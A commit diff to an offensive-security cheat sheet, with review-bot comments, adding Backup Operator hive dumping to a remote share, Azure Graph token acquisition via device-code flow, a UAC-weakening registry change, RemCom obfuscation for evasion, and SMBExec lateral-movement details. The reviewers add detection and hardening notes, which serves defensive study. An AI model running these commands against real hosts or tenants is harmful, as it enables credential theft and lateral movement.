SMBExec + Refresh & Access Token Azure

Swissky 2023-02-15 17:03:49 +01:00
parent 411f2455a9
commit 8442b304c9
3 changed files with 122 additions and 41 deletions

View File

@ -2966,6 +2966,9 @@ This groups grants the following privileges :
$winlogon = $reg.OpenSubKey('SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon') $winlogon = $reg.OpenSubKey('SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon')
$winlogon.GetValueNames() | foreach {"$_ : $(($winlogon).GetValue($_))"} $winlogon.GetValueNames() | foreach {"$_ : $(($winlogon).GetValue($_))"}
``` ```
* Retrieve SAM,SECURITY and SYSTEM hives
* [mpgn/BackupOperatorToDA](https://github.com/mpgn/BackupOperatorToDA): `.\BackupOperatorToDA.exe -t \\dc1.lab.local -u user -p pass -d domain -o \\10.10.10.10\SHARE\`
* [improsec/BackupOperatorToolkit](https://github.com/improsec/BackupOperatorToolkit): `.\BackupOperatorToolkit.exe DUMP \\PATH\To\Dump \\TARGET.DOMAIN.DK`
### Abusing Active Directory ACLs/ACEs ### Abusing Active Directory ACLs/ACEs
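Review bot: `SAM,SECURITY` in the new bullet is missing a space after the comma, and the bullet sits directly after the closing fence with no blank line, which some renderers fold into the code block; suggest a blank line followed by `* Retrieve SAM, SECURITY and SYSTEM hives`. It would also help to say in one clause what the two tools do with those hives (they read them remotely using the group privilege this section is about, and the `-o \\10.10.10.10\SHARE\` and `\\PATH\To\Dump` arguments are where the dump is written), since the registry read above is the only context a reader has.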

View File

@ -3,6 +3,9 @@
## Summary ## Summary
* [Azure Recon Tools](#azure-recon-tools) * [Azure Recon Tools](#azure-recon-tools)
* [Authenticating to the Microsoft Graph API in PowerShell](#authenticating-to-the-microsoft-graph-api-in-powershell)
* [Graph API Refresh Token](#graph-api-refresh-token)
* [Graph API Access Token](#graph-api-access-token)
* [Terminology](#terminology) * [Terminology](#terminology)
* [Training](#training) * [Training](#training)
* [Enumeration](#enumeration) * [Enumeration](#enumeration)
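Review bot: the new entries `Graph API Refresh Token` and `Graph API Access Token` are `###` subsections of `Authenticating to the Microsoft Graph API in PowerShell` later in this diff, but they are listed here at the same level as their parent; indent them one level under the parent bullet so the summary mirrors the heading hierarchy.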
@ -60,35 +63,6 @@
## Azure Recon Tools ## Azure Recon Tools
* [**ROADTool**](https://github.com/dirkjanm/ROADtools) - The Azure AD exploration framework.
```powershell
pipenv shell
roadrecon auth [-h] [-u USERNAME] [-p PASSWORD] [-t TENANT] [-c CLIENT] [--as-app] [--device-code] [--access-token ACCESS_TOKEN] [--refresh-token REFRESH_TOKEN] [-f TOKENFILE] [--tokens-stdout]
roadrecon gather [-h] [-d DATABASE] [-f TOKENFILE] [--tokens-stdin] [--mfa]
roadrecon auth -u test@<TENANT NAME>.onmicrosoft.com -p <PASSWORD>
roadrecon gather
roadrecon gui
```
* [**Azure/StormSpotter**](https://github.com/Azure/Stormspotter) - Azure Red Team tool for graphing Azure and Azure Active Directory objects
```powershell
# session 1 - backend
pipenv shell
python ssbackend.pyz
# session 2 - frontend
cd C:\Tools\stormspotter\frontend\dist\spa\
quasar.cmd serve -p 9091 --history
# session 3 - collector
pipenv shell
az login -u test@<TENANT NAME>.onmicrosoft.com -p <PASSWORD>
python C:\Tools\stormspotter\stormcollector\sscollector.pyz cli
# Web access on http://localhost:9091
Username: neo4j
Password: BloodHound
Server: bolt://localhost:7687
```
* [**BloodHoundAD/AzureHound**](https://github.com/BloodHoundAD/AzureHound) - Azure Data Exporter for BloodHound * [**BloodHoundAD/AzureHound**](https://github.com/BloodHoundAD/AzureHound) - Azure Data Exporter for BloodHound
```powershell ```powershell
# First, retrieve a refresh token (-r) if username/password isn't supported. # First, retrieve a refresh token (-r) if username/password isn't supported.
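Review bot: this hunk only removes the ROADTool and StormSpotter entries, which reappear unchanged in a later hunk, so it is a reorder rather than a content change; nothing to fix here, though while the blocks are being moved the `powershell` fence tag on both is worth revisiting, since `pipenv shell`, `roadrecon ...` and `python ssbackend.pyz` are shell-agnostic commands and `quasar.cmd` is the only Windows-specific line.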
@ -98,6 +72,8 @@
$rt = (Get-AADIntAccessToken -ClientId "1950a258-227b-4e31-a9cf-717495945fc2" -Resource "https://graph.microsoft.com" -PRTToken (Get-AADIntUserPRTToken) -IncludeRefreshToken $true)[1] $rt = (Get-AADIntAccessToken -ClientId "1950a258-227b-4e31-a9cf-717495945fc2" -Resource "https://graph.microsoft.com" -PRTToken (Get-AADIntUserPRTToken) -IncludeRefreshToken $true)[1]
# Second, launch azurehound collector # Second, launch azurehound collector
./azurehound -r "0.AXMAMe..." list --tenant "753a0bc5-..." -o output.json
## Connects on your Azure account using the refresh token provided and the tenant of the account ## Connects on your Azure account using the refresh token provided and the tenant of the account
## and collects every possible objects in contoso.microsoft.com. Results are stored in json ## and collects every possible objects in contoso.microsoft.com. Results are stored in json
./azurehound -r $rt --tenant "contoso.onmicrosoft.com" list -o azurehound-scan.json --tenant "contoso.microsoft.com" ./azurehound -r $rt --tenant "contoso.onmicrosoft.com" list -o azurehound-scan.json --tenant "contoso.microsoft.com"
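Review bot: the added `./azurehound -r "0.AXMAMe..." list --tenant "753a0bc5-..." -o output.json` duplicates the purpose of the existing last line, which still passes `--tenant` twice with two different values (`contoso.onmicrosoft.com` and `contoso.microsoft.com`); replace that line with the new one, or drop one of its `--tenant` arguments, rather than keeping both, and use a single output filename between the comment (`Results are stored in json`) and the commands (`output.json` vs `azurehound-scan.json`).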
@ -141,13 +117,42 @@
MATCH p = (n)-[r]->(g:AZKeyVault) RETURN p MATCH p = (n)-[r]->(g:AZKeyVault) RETURN p
MATCH (n) WHERE n.azname IS NOT NULL AND n.azname <> "" AND n.name IS NULL SET n.name = n.azname MATCH (n) WHERE n.azname IS NOT NULL AND n.azname <> "" AND n.name IS NULL SET n.name = n.azname
``` ```
* [BloodHoundAD/BARK](https://github.com/BloodHoundAD/BARK) - BloodHound Attack Research Kit * [**BloodHoundAD/BARK**](https://github.com/BloodHoundAD/BARK) - BloodHound Attack Research Kit
```ps1 ```ps1
. .\BARK.ps1 . .\BARK.ps1
$MyRefreshTokenRequest = Get-AZRefreshTokenWithUsernamePassword -username "user@contoso.onmicrosoft.com" -password "MyVeryCoolPassword" -TenantID "contoso.onmicrosoft.com" $MyRefreshTokenRequest = Get-AZRefreshTokenWithUsernamePassword -username "user@contoso.onmicrosoft.com" -password "MyVeryCoolPassword" -TenantID "contoso.onmicrosoft.com"
$MyMSGraphToken = Get-MSGraphTokenWithRefreshToken -RefreshToken $MyRefreshTokenRequest.refresh_token -TenantID "contoso.onmicrosoft.com" $MyMSGraphToken = Get-MSGraphTokenWithRefreshToken -RefreshToken $MyRefreshTokenRequest.refresh_token -TenantID "contoso.onmicrosoft.com"
$MyAADUsers = Get-AllAzureADUsers -Token $MyMSGraphToken.access_token -ShowProgress $MyAADUsers = Get-AllAzureADUsers -Token $MyMSGraphToken.access_token -ShowProgress
``` ```
* [**ROADTool**](https://github.com/dirkjanm/ROADtools) - The Azure AD exploration framework.
```powershell
pipenv shell
roadrecon auth [-h] [-u USERNAME] [-p PASSWORD] [-t TENANT] [-c CLIENT] [--as-app] [--device-code] [--access-token ACCESS_TOKEN] [--refresh-token REFRESH_TOKEN] [-f TOKENFILE] [--tokens-stdout]
roadrecon gather [-h] [-d DATABASE] [-f TOKENFILE] [--tokens-stdin] [--mfa]
roadrecon auth -u test@<TENANT NAME>.onmicrosoft.com -p <PASSWORD>
roadrecon gather
roadrecon gui
```
* [**Azure/StormSpotter**](https://github.com/Azure/Stormspotter) - Azure Red Team tool for graphing Azure and Azure Active Directory objects
```powershell
# session 1 - backend
pipenv shell
python ssbackend.pyz
# session 2 - frontend
cd C:\Tools\stormspotter\frontend\dist\spa\
quasar.cmd serve -p 9091 --history
# session 3 - collector
pipenv shell
az login -u test@<TENANT NAME>.onmicrosoft.com -p <PASSWORD>
python C:\Tools\stormspotter\stormcollector\sscollector.pyz cli
# Web access on http://localhost:9091
Username: neo4j
Password: BloodHound
Server: bolt://localhost:7687
```
* [**Microsoft Portals**](https://msportals.io/) - Microsoft Administrator Sites * [**Microsoft Portals**](https://msportals.io/) - Microsoft Administrator Sites
* [**nccgroup/Azucar**](https://github.com/nccgroup/azucar.git) : Azucar automatically gathers a variety of configuration data and analyses all data relating to a particular subscription in order to determine security risks. * [**nccgroup/Azucar**](https://github.com/nccgroup/azucar.git) : Azucar automatically gathers a variety of configuration data and analyses all data relating to a particular subscription in order to determine security risks.
```powershell ```powershell
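Review bot: apart from bolding `BloodHoundAD/BARK` to match its neighbours, this hunk re-inserts the ROADTool and StormSpotter blocks byte-for-byte from the hunk above, so their content needs no second review. One caveat worth a comment in the relocated StormSpotter block: `Username: neo4j` / `Password: BloodHound` are shared default credentials for the graph database the frontend connects to on `bolt://localhost:7687`, so a reader should change them on any instance that is not a throwaway lab.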
@ -208,6 +213,59 @@
$ Create-Backdoor, Execute-Backdoor $ Create-Backdoor, Execute-Backdoor
``` ```
## Authenticating to the Microsoft Graph API in PowerShell
* [Microsoft Applications ID](https://learn.microsoft.com/fr-fr/troubleshoot/azure/active-directory/verify-first-party-apps-sign-in)
| Name | GUID |
|----------------------------|--------------------------------------|
| Microsoft Azure PowerShell | 1950a258-227b-4e31-a9cf-717495945fc2 |
| Microsoft Azure CLI | 04b07795-8ddb-461a-bbee-02f9e1bf7b46 |
| Portail Azure | c44b4083-3bb0-49c1-b47d-974e53cbdf3c |
### Graph API Refresh Token
Authenticating to the Microsoft Graph API in PowerShell
```ps1
$body = @{
"client_id" = "1950a258-227b-4e31-a9cf-717495945fc2"
"resource" = "https://graph.microsoft.com" # Microsoft Graph API
}
$UserAgent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
$Headers=@{}
$Headers["User-Agent"] = $UserAgent
$authResponse = Invoke-RestMethod `
-UseBasicParsing `
-Method Post `
-Uri "https://login.microsoftonline.com/common/oauth2/devicecode?api-version=1.0" `
-Headers $Headers `
-Body $body
$authResponse
```
### Graph API Access Token
This request require getting the Refresh Token.
```ps1
$body=@{
"client_id" = "1950a258-227b-4e31-a9cf-717495945fc2"
"grant_type" = "urn:ietf:params:oauth:grant-type:device_code"
"code" = $authResponse.device_code
}
$Tokens = Invoke-RestMethod `
-UseBasicParsing `
-Method Post `
-Uri "https://login.microsoftonline.com/Common/oauth2/token?api-version=1.0" `
-Headers $Headers `
-Body $body
$Tokens
```
## Terminology ## Terminology
> Basic Azure AD terminologies > Basic Azure AD terminologies
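Review bot: the new `### Graph API Refresh Token` subsection does not request a refresh token: its POST to `.../oauth2/devicecode?api-version=1.0` starts a device-code flow and returns the device code that the next block reads as `$authResponse.device_code`; the refresh token (together with the access token) is what the second POST to `.../oauth2/token` with `grant_type = urn:ietf:params:oauth:grant-type:device_code` returns in `$Tokens`. Suggest renaming the two subsections to `Device Code Request` and `Access and Refresh Tokens` (and the two summary entries with them), and rewording `This request require getting the Refresh Token.` to say that it requires the device code from the previous request and only succeeds once that code has been redeemed interactively, which is how the device-code grant works. Since the `client_id` used (`1950a258-227b-4e31-a9cf-717495945fc2`) is listed in the new table as Microsoft Azure PowerShell, a comment saying so next to `"client_id"` would tell readers which first-party application the resulting sign-in is attributed to. Smaller points: the line `Authenticating to the Microsoft Graph API in PowerShell` under the first subsection repeats the section heading and can go; `Portail Azure` in the table should be `Azure Portal`, and the `fr-fr` link would be better pointed at the `en-us` page; the table needs a blank line after the `* [Microsoft Applications ID]` bullet to render; and the second block silently depends on `$Headers` and `$authResponse` from the first, which is fine in one session but deserves a comment.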

View File

@ -11,6 +11,7 @@
* [Impacket](#impacket) * [Impacket](#impacket)
* [PSExec](#psexec) * [PSExec](#psexec)
* [WMIExec](#wmiexec) * [WMIExec](#wmiexec)
* [SMBExec](#smbexec)
* [RDP Remote Desktop Protocol](#rdp-remote-desktop-protocol) * [RDP Remote Desktop Protocol](#rdp-remote-desktop-protocol)
* [Powershell Remoting Protocol](#powershell-remoting-protocol) * [Powershell Remoting Protocol](#powershell-remoting-protocol)
@ -123,13 +124,13 @@ From [fortra/impacket](https://github.com/fortra/impacket) (:warning: renamed to
All Impacket's *exec scripts are not equal, they will target services hosted on multiples ports. All Impacket's *exec scripts are not equal, they will target services hosted on multiples ports.
The following table summarize the port used by each scripts. The following table summarize the port used by each scripts.
| Method | Port Used | | Method | Port Used | Admin Required |
|-------------|---------------------------------------| |-------------|---------------------------------------|----------------|
| psexec.py | tcp/445 | | psexec.py | tcp/445 | Yes |
| smbexec.py | tcp/445 | | smbexec.py | tcp/445 | No |
| atexec.py | tcp/445 | | atexec.py | tcp/445 | No |
| dcomexec.py | tcp/135, tcp/445, tcp/49751 (DCOM) | | dcomexec.py | tcp/135, tcp/445, tcp/49751 (DCOM) | No |
| wmiexec.py | tcp/135, tcp/445, tcp/50911 (Winmgmt) | | wmiexec.py | tcp/135, tcp/445, tcp/50911 (Winmgmt) | Yes |
* `psexec`: equivalent of Windows PSEXEC using RemComSvc binary. * `psexec`: equivalent of Windows PSEXEC using RemComSvc binary.
```ps1 ```ps1
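Review bot: the new `Admin Required` column lists `smbexec.py` as `No`, but the `### SMBExec` section added further down in this same diff says it creates a service named `BTOBTO` and writes its output to `\\127.0.0.1\C$\__output`, both of which need administrative rights on the target, so that cell should be `Yes`; please re-check `atexec.py` and `dcomexec.py` against the same standard before merging, and say in the sentence above the table what `Admin Required` means (local administrator on the target).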
@ -153,15 +154,23 @@ The following table summarize the port used by each scripts.
wmiexec.py DOMAIN/username@10.10.10.10 -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 wmiexec.py DOMAIN/username@10.10.10.10 -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
``` ```
To allow Non-RID 500 local admin accounts performing Wmi or PsExec, execute:
`reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /f /d 1`
To prevent RID 500 from being able to WmiExec or PsExec, execute:
`reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v FilterAdministratorToken /t REG_DWORD /f /d 1`
### PSExec ### PSExec
PSExec default [kavika13/RemCom](https://github.com/kavika13/RemCom) binary is 10 years old, you might want to rebuild it and obfuscate it to reduce detections [snovvcrash/RemComObf.sh](https://gist.github.com/snovvcrash/123945e8f06c7182769846265637fedb) Instead of uploading `psexeccsv` service binary, it uploads to `ADMIN$` a service binary with an arbitrary name.
PSExec default [kavika13/RemCom](https://github.com/kavika13/RemCom) binary is 10 years old, you might want to rebuild it and obfuscate it to reduce detections ([snovvcrash/RemComObf.sh](https://gist.github.com/snovvcrash/123945e8f06c7182769846265637fedb))
Use a custom binary and service name with : `psexec.py Administrator:Password123@IP -service-name customservicename -remote-binary-name custombin.exe` Use a custom binary and service name with : `psexec.py Administrator:Password123@IP -service-name customservicename -remote-binary-name custombin.exe`
Also a custom file can be specified with the parameter : `-file /tmp/RemComSvcCustom.exe`. Also a custom file can be specified with the parameter : `-file /tmp/RemComSvcCustom.exe`.
You need to update the pipe name to match "Custom_communication" in the line 163 You need to update the pipe name to match "Custom_communication" in the line 163
`fid_main = self.openPipe(s,tid,r'\RemCom_communicaton',0x12019f)` `fid_main = self.openPipe(s,tid,r'\RemCom_communicaton',0x12019f)`. Alternatively you can use the fork [ThePorgs/impacket](https://github.com/ThePorgs/impacket/pull/3/files).
### WMIExec ### WMIExec
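Review bot: `psexeccsv` in the new opening sentence of `### PSExec` looks like a typo for the `PSEXESVC` service binary the Windows tool drops, and the sentence needs a subject (`psexec.py` rather than `it`) now that it opens the section. For the two `reg add` lines above it, state the direction of each change explicitly: setting `LocalAccountTokenFilterPolicy` to `1` removes the UAC remote restriction for non-RID-500 local administrators (a hardening regression on that host), while setting `FilterAdministratorToken` to `1` tightens it for the built-in RID-500 account; as written, both read like neutral setup steps. The second `reg add` line also needs a blank line before it so the inline code renders on its own line.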
@ -169,6 +178,15 @@ Use a non default share `-share SHARE` to write the output to reduce the detecti
By default this command is executed : `cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__RANDOM 2>&1` By default this command is executed : `cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__RANDOM 2>&1`
### SMBExec
It creates a service with the name `BTOBTO` ([smbexec.py#L59](https://github.com/fortra/impacket/blob/master/examples/smbexec.py#L59)) and transfers commands from the attacker in a bat file in `%TEMP/execute.bat` ([smbexec.py#L56](https://github.com/fortra/impacket/blob/master/examples/smbexec.py#L56)).
It will create a new service every time we execute a command. It will also generate an Event 7045.
By default this command is execute: `%COMSPEC% /Q /c echo dir > \\127.0.0.1\C$\__output 2>&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat`, where `%COMSPEC%` points to `C:\WINDOWS\system32\cmd.exe`.
## RDP Remote Desktop Protocol ## RDP Remote Desktop Protocol
:warning: **NOTE**: You may need to enable RDP and disable NLA and fix CredSSP errors. :warning: **NOTE**: You may need to enable RDP and disable NLA and fix CredSSP errors.
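Review bot: `%TEMP/execute.bat` in the first sentence of `### SMBExec` should be `%TEMP%\execute.bat`, matching the command shown two lines later, and `By default this command is execute:` should read `executed`. Since the section already notes that every command installs a new service and generates Event 7045, spell out that this is the System log's service-installation event (service name `BTOBTO`, image path running `%COMSPEC% /Q /c ... %TEMP%\execute.bat`) and that the output file `\\127.0.0.1\C$\__output` is a second artefact, so readers on the detection side know what the noise looks like; `transfers commands from the attacker in a bat file` also reads better as `writes each command to a batch file`.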
@ -216,7 +234,6 @@ Abuse RDP protocol to execute commands remotely with the following commands;
``` ```
## Powershell Remoting Protocol ## Powershell Remoting Protocol
### Powershell Credentials ### Powershell Credentials
@ -339,5 +356,8 @@ PS C:\> runas /noprofil /netonly /user:DOMAIN\username cmd.exe
- [Ropnop - Using credentials to own Windows boxes](https://blog.ropnop.com/using-credentials-to-own-windows-boxes/) - [Ropnop - Using credentials to own Windows boxes](https://blog.ropnop.com/using-credentials-to-own-windows-boxes/)
- [Ropnop - Using credentials to own Windows boxes Part 2](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/) - [Ropnop - Using credentials to own Windows boxes Part 2](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/)
- [Gaining Domain Admin from Outside Active Directory](https://markitzeroday.com/pass-the-hash/crack-map-exec/2018/03/04/da-from-outside-the-domain.html) - [Gaining Domain Admin from Outside Active Directory](https://markitzeroday.com/pass-the-hash/crack-map-exec/2018/03/04/da-from-outside-the-domain.html)
- [Impacket Remote code execution on Windows from Linux by Vry4n_ | Jun 20, 2021](https://vk9-sec.com/impacket-remote-code-execution-rce-on-windows-from-linux/) - [Impacket Remote code execution on Windows from Linux by Vry4n_ - Jun 20, 2021](https://vk9-sec.com/impacket-remote-code-execution-rce-on-windows-from-linux/)
- [Impacket Exec Commands Cheat Sheet - 13cubed](https://www.13cubed.com/downloads/impacket_exec_commands_cheat_sheet.pdf) - [Impacket Exec Commands Cheat Sheet - 13cubed](https://www.13cubed.com/downloads/impacket_exec_commands_cheat_sheet.pdf)
- [SMB protocol cheatsheet - aas-s3curity](https://aas-s3curity.gitbook.io/cheatsheet/internalpentest/active-directory/post-exploitation/lateral-movement/smb-protocol)
- [Windows Lateral Movement with smb, psexec and alternatives - nv2lt](https://nv2lt.github.io/windows/smb-psexec-smbexec-winexe-how-to/)
- [PsExec.exe IOCs and Detection - Threatexpress](https://threatexpress.com/redteaming/tool_ioc/psexec/)